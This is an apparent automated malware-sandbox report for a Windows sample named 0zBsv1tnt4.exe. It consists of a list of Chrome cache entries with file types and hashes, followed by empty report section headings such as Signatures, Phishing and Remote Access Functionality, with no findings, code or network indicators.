Chrome Cache Entry: 102	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	512625CF8F40021445D74253DC7C28C0	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
Chrome Cache Entry: 103	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors	12E3DAC858061D088023B2BD48E2FA96	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
Chrome Cache Entry: 104	JSON data	B5885C991E30238110973653F2408300	39B0A79D951F8254E21821134E047C76F57AD2A8	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
Chrome Cache Entry: 105	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors	12E3DAC858061D088023B2BD48E2FA96	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
Chrome Cache Entry: 106	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced	F6EC97C43480D41695065AD55A97B382	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
Chrome Cache Entry: 107	ASCII text, with very long lines (33273), with no line terminators	86E84C732A96BF9CF18C99B48DB90B6D	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
Chrome Cache Entry: 108	JSON data	B5885C991E30238110973653F2408300	39B0A79D951F8254E21821134E047C76F57AD2A8	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
Chrome Cache Entry: 109	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0	4D0BFEA9EBDA0657CEE433600ED087B6	F13C690B170D5BA6BE45DEDC576776CA79718D98	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
Chrome Cache Entry: 110	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3	8CCB0248B7F2ABEEAD74C057232DF42A	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
Chrome Cache Entry: 111	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced	522037F008E03C9448AE0AAAF09E93CB	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
Chrome Cache Entry: 112	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators	1FF4CE3C1DB69A5146B03AD8BE62F5EB	5D177F6D11FCFF2BD62E61983383BB39D9F045E4	222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
Chrome Cache Entry: 113	JSON data	0E78F790402498FA57E649052DA01218	9ED4D0846DA5D66D44EE831920B141BBF60A0200	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
Chrome Cache Entry: 114	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3	8CCB0248B7F2ABEEAD74C057232DF42A	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
Chrome Cache Entry: 115	exported SGML document, ASCII text, with very long lines (65536), with no line terminators	2E00D51C98DBB338E81054F240E1DEB2	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
Chrome Cache Entry: 116	SVG Scalable Vector Graphics image	37258A983459AE1C2E4F1E551665F388	603A4E9115E613CC827206CF792C62AEB606C941	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
Chrome Cache Entry: 117	ASCII text, with very long lines (33273), with no line terminators	86E84C732A96BF9CF18C99B48DB90B6D	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
Chrome Cache Entry: 118	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced	522037F008E03C9448AE0AAAF09E93CB	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
Chrome Cache Entry: 119	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced	F6EC97C43480D41695065AD55A97B382	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
Chrome Cache Entry: 120	JSON data	0E78F790402498FA57E649052DA01218	9ED4D0846DA5D66D44EE831920B141BBF60A0200	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
Chrome Cache Entry: 121	ASCII text, with very long lines (46884)	F57E274AE8E8889C7516D3E53E3EB026	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
Chrome Cache Entry: 122	JSON data	EBA6E81304F2F555E1D2EA3126A18A41	61429C3FE837FD4DD68E7B26678F131F2E00070D	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
Chrome Cache Entry: 123	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	240C4CC15D9FD65405BB642AB81BE615	5A66783FE5DD932082F40811AE0769526874BFD3	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
Chrome Cache Entry: 85	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	512625CF8F40021445D74253DC7C28C0	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
Chrome Cache Entry: 86	ASCII text	6B8763B76F400DC480450FD69072F215	6932907906AFCF8EAFA22154D8478106521BC9EE	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
Chrome Cache Entry: 87	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	240C4CC15D9FD65405BB642AB81BE615	5A66783FE5DD932082F40811AE0769526874BFD3	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
Chrome Cache Entry: 88	SVG Scalable Vector Graphics image	37258A983459AE1C2E4F1E551665F388	603A4E9115E613CC827206CF792C62AEB606C941	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
Chrome Cache Entry: 89	JSON data	EBA6E81304F2F555E1D2EA3126A18A41	61429C3FE837FD4DD68E7B26678F131F2E00070D	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
Chrome Cache Entry: 90	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	3062488F9D119C0D79448BE06ED140D8	8A148951C894FC9E968D3E46589A2E978267650E	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
Chrome Cache Entry: 91	ASCII text, with no line terminators	0B04EA412F8FC88B51398B1CBF38110E	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
Chrome Cache Entry: 92	JSON data	0A0F2E1CCB8E5F7C38CB11B101A8941F	112F4B7CB3DEDB9D9744CAC000E05DC949E89891	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
Chrome Cache Entry: 93	ASCII text, with very long lines (65410)	9445D8D43537540BC89651C93A9C3832	EC3066770D52DB58CB7E44C54C3ABAA40CEB121A	586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
Chrome Cache Entry: 94	JSON data	0A0F2E1CCB8E5F7C38CB11B101A8941F	112F4B7CB3DEDB9D9744CAC000E05DC949E89891	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
Chrome Cache Entry: 95	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	3062488F9D119C0D79448BE06ED140D8	8A148951C894FC9E968D3E46589A2E978267650E	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
Chrome Cache Entry: 96	ASCII text	6B8763B76F400DC480450FD69072F215	6932907906AFCF8EAFA22154D8478106521BC9EE	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
Chrome Cache Entry: 97	ASCII text, with very long lines (65536), with no line terminators	875E7F3672FEC41DDB5A2386D2331531	282979933E99BDE3A6342DC1EF93FBC51682F2C3	F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
Chrome Cache Entry: 98	ASCII text, with very long lines (52717), with no line terminators	413FCC759CC19821B61B6941808B29B5	1AD23B8A202043539C20681B1B3E9F3BC5D55133	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
Chrome Cache Entry: 99	ASCII text, with very long lines (52717), with no line terminators	413FCC759CC19821B61B6941808B29B5	1AD23B8A202043539C20681B1B3E9F3BC5D55133	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536

Windows Analysis Report 0zBsv1tnt4.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
0zBsv1tnt4.exe

Malware Threat Intel
Provided by